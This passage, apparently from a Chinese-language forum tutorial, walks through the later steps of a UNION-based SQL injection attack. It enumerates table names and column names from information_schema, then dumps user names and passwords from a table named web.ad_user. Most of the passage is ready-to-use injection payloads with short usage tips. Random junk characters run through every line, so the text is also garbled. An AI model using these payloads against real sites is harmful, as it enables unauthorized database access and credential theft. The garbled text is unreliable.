! o2 A& J% j0 \三.暴表 ( C U9 \/ M( P( V9 y/ ]# [2 }, m( m! C) l
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/* / \1 S* a: C; J% a% }0 ^2 i ' R% ^+ M: _ F( G: I. { Dlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。 ?" P6 A* D* w
0 _1 l! l) `5 Y
四.暴字段 + e8 J9 r5 A0 N* M2 j5 G8 Z+ c# l" P; e) v
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- O6 q4 l" ~- W0 A9 F9 u
( i9 I$ H" ^7 P- S( }; J6 |0 ~8 a% U( flimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 J" p3 }# C) _# Z+ T4 k5 B
2 u4 D; D% s* P. G. s& a5 X
五.暴数据1 y% Q8 g" I2 \1 ]
0 } {( D( ^& E& Band 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/* " w: y3 M G- s6 |3 W H. x 7 ^0 r4 r! I7 `6 r8 Y0 Q ; G1 r' h: c6 n, i. G! C这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 c& P# X( T0 k* X* @0 d" g